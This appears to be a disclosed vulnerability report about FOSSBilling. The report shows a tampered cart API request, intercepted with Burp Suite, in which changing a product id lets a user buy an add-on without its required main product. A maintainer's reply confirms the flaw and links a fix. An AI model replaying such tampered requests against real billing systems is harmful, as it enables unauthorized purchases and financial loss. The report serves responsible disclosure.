Users can order Add-Ons Separately in fossbilling/fossbilling
Reported on
Jun 11th 2023
Description
I find a requirement that addons must be purchased in conjunction with a product. However, a vulnerability has been discovered where an attacker can modify the product ID during the order process, allowing them to bypass the main product order requirement and directly purchase the addon.
Proof of Concept
1 user orders the product
2 using burpsuit hijack the request
POST /index.php?_url=/api/guest/cart/add_item HTTP/1.1
Host: localhost
Content-Length: 58
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
sec-ch-ua-platform: "macOS"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/orderbutton?order=8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: BOXCLR=e%3DdXNlcjNAdGVzdC5jb20%3D%26p%3DJDJ5JDEwJEltbDNnQXl0di8xdy5wZFpWQW9pNi40UVhsSnd3R2h5OENCT0VCYVp3ZmhGc2paU3N5UzJx; ADMIDIO_admidio_adm_SESSION_ID=28c355e130917b8a2f817792256db866; ADMIDIO_admidio_adm_cookieconsent_status=dismiss; PHPSESSID=9fd364ab4e45a218a605f6129bfec942; BBLANG=en_US
Connection: close
CSRFToken=593265e9721d74ae839c486bc5a96102&form_id=1&id=6&&multiple=1&id=1
3 change the id = 1 as id =6
4 id = 6 means that id of one addon is 6
5 send reqeust and find success.
Impact
This vulnerability could potentially result in unauthorized purchases and financial loss .
Thanks for the report. I was able to valid this and I've proposed changes which will both prevent add-ons from being added to the cart without an associated product and it introduces checks to ensure the add-ons are valid for the selected product.
https://github.com/FOSSBilling/FOSSBilling/pull/1313